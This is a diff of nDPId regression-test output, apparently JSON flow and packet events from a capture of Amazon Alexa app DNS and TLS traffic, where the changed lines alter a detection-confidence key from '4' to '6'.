00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1937,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976115835,"flow_last_seen":1490976115835,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1490976115835,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":28614,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1937,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":114,"flow_packet_id":1,"flow_last_seen":1490976115835,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":99,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":99,"pkt_l4_len":65,"thread_ts_msec":1490976115835,"pkt":"AMDKkaPvePiC0\/vCCABFAABVWl5AAEARM0CsECrYrBAqAW\/GADUAQT0E1ZsBAAABAAAAAAAAD21vYmlsZWFuYWx5dGljcwl1cy1lYXN0LTEJYW1hem9uYXdzA2NvbQAAAQAB"} -00806{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1937,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976115835,"flow_last_seen":1490976115835,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1490976115835,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":28614,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"mobileanalytics.us-east-1.amazonaws.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00806{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1937,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976115835,"flow_last_seen":1490976115835,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1490976115835,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":28614,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"mobileanalytics.us-east-1.amazonaws.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1940,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":114,"flow_packet_id":2,"flow_last_seen":1490976115901,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":115,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":115,"pkt_l4_len":81,"thread_ts_msec":1490976115901,"pkt":"ePiC0\/vCAMDKkaPvCABFAABl30tAAEARrkKsECoBrBAq2AA1b8YAUeVS1ZuBgAABAAEAAAAAD21vYmlsZWFuYWx5dGljcwl1cy1lYXN0LTEJYW1hem9uYXdzA2NvbQAAAQABwAwAAQABAAAAIQAENu8YtA=="} -00821{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1940,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976115835,"flow_last_seen":1490976115901,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976115901,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":28614,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"mobileanalytics.us-east-1.amazonaws.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.24.180"}} +00821{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1940,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976115835,"flow_last_seen":1490976115901,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976115901,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":28614,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"mobileanalytics.us-east-1.amazonaws.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.24.180"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1941,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976115905,"flow_last_seen":1490976115905,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976115905,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37551,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1941,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_packet_id":1,"flow_last_seen":1490976115905,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976115905,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8JUVAAEAG7uusECrYNu8YtJKvAbsZEE7TAAAAAKAC\/\/+4mQAAAgQFtAQCCAoA9muWAAAAAAEDAwg="} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1942,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976116084,"flow_last_seen":1490976116084,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976116084,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37552,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1942,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":116,"flow_packet_id":1,"flow_last_seen":1490976116084,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976116084,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8uXBAAEAGWsCsECrYNu8YtJKwAbtgAdLYAAAAAKAC\/\/\/tjwAAAgQFtAQCCAoA9muoAAAAAAEDAwg="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1943,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_packet_id":2,"flow_last_seen":1490976116119,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976116119,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwcfNAAOcG+0g27xi0rBAq2AG7kq+qRjf5GRBO1HASH\/5e8QAAAgQFtAEDAwY="} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1944,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_packet_id":3,"flow_last_seen":1490976116121,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976116121,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoJUZAAEAG7v6sECrYNu8YtJKvAbsZEE7UqkY3+lAQAVepYgAA"} -00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1945,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976115905,"flow_last_seen":1490976116122,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976116122,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37551,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1945,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976115905,"flow_last_seen":1490976116122,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976116122,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37551,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1946,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":116,"flow_packet_id":2,"flow_last_seen":1490976116248,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976116248,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwirZAAOcG4oU27xi0rBAq2AG7krCs\/eb6YAHS2XASH\/7iQAAAAgQFtAEDAwY="} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1947,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":116,"flow_packet_id":3,"flow_last_seen":1490976116249,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976116249,"pkt":"AMDKkaPvePiC0\/vCCABFAAAouXFAAEAGWtOsECrYNu8YtJKwAbtgAdLZrP3m+1AQAVcssgAA"} -00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1969,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976115905,"flow_last_seen":1490976118335,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":933,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1490976118335,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37551,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1969,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976115905,"flow_last_seen":1490976118335,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":933,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1490976118335,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37551,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2001,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976130073,"flow_last_seen":1490976130073,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976130073,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40864,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2001,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_packet_id":1,"flow_last_seen":1490976130073,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976130073,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8j51AAEAGf0qsECrYNu8d\/Z+gAbt6Gf6DAAAAAKAC\/\/+QHQAAAgQFtAQCCAoA9nEeAAAAAAEDAwg="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2002,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_packet_id":2,"flow_last_seen":1490976130307,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976130307,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAww\/RAAOcGo\/427x39rBAq2AG7n6DOZIqUehn+hHASH\/7FQwAAAgQFtAEDAwY="} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2003,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_packet_id":3,"flow_last_seen":1490976130308,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976130308,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoj55AAEAGf12sECrYNu8d\/Z+gAbt6Gf6EzmSKlVAQAVcPtQAA"} -00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2004,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976130073,"flow_last_seen":1490976130310,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1490976130310,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40864,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01026{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2005,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976130073,"flow_last_seen":1490976130469,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976130469,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40864,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2004,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976130073,"flow_last_seen":1490976130310,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1490976130310,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40864,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01026{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2005,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976130073,"flow_last_seen":1490976130469,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976130469,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40864,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2030,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976133936,"flow_last_seen":1490976133936,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1490976133936,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4920,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2030,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":118,"flow_packet_id":1,"flow_last_seen":1490976133936,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1490976133936,"pkt":"AMDKkaPvePiC0\/vCCABFAABDWl9AAEARM1GsECrYrBAqARM4ADUALyGouR4BAAABAAAAAAAAA2VjeA1pbWFnZXMtYW1hem9uA2NvbQAAAQAB"} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2030,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976133936,"flow_last_seen":1490976133936,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1490976133936,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4920,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"ecx.images-amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2030,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976133936,"flow_last_seen":1490976133936,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1490976133936,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4920,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"ecx.images-amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00729{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2033,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":118,"flow_packet_id":2,"flow_last_seen":1490976134135,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":252,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":252,"pkt_l4_len":218,"thread_ts_msec":1490976134135,"pkt":"ePiC0\/vCAMDKkaPvCABFAADu5XxAAEARp4isECoBrBAq2AA1EzgA2tC0uR6BgAABAAkAAAAAA2VjeA1pbWFnZXMtYW1hem9uA2NvbQAAAQABwAwABQABAAAAMQAfDmQxZ2Uwa2sxbDVrbXMwCmNsb3VkZnJvbnQDbmV0AMAzAAEAAQAAADsABDRUPzjAMwABAAEAAAA7AAQ0VD8QwDMAAQABAAAAOwAENFQ\/PcAzAAEAAQAAADsABDRUPxrAMwABAAEAAAA7AAQ0VD\/swDMAAQABAAAAOwAENFQ\/I8AzAAEAAQAAADsABDRUP9\/AMwABAAEAAAA7AAQ0VD\/n"} -00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2033,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976133936,"flow_last_seen":1490976134135,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":124,"midstream":0,"thread_ts_msec":1490976134135,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4920,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"ecx.images-amazon.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.84.63.56"}} +00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2033,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976133936,"flow_last_seen":1490976134135,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":124,"midstream":0,"thread_ts_msec":1490976134135,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4920,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"ecx.images-amazon.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.84.63.56"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2034,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976134140,"flow_last_seen":1490976134140,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976134140,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51985,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2034,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":119,"flow_packet_id":1,"flow_last_seen":1490976134140,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134140,"pkt":"AMDKkaPvePiC0\/vCCABFAAA82ItAAEAGF7ysECrYNFQ\/OMsRAFDDaqo+AAAAAKAC\/\/9Q1AAAAgQFtAQCCAoA9nK1AAAAAAEDAwg="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2035,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976134141,"flow_last_seen":1490976134141,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976134141,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51986,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -674,24 +674,24 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2043,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":120,"flow_packet_id":2,"flow_last_seen":1490976134199,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134199,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxLyFCLFnmK3JKAScSD4HAAAAgQFtAQCCAps+n3SAPZytgEDAwg="} 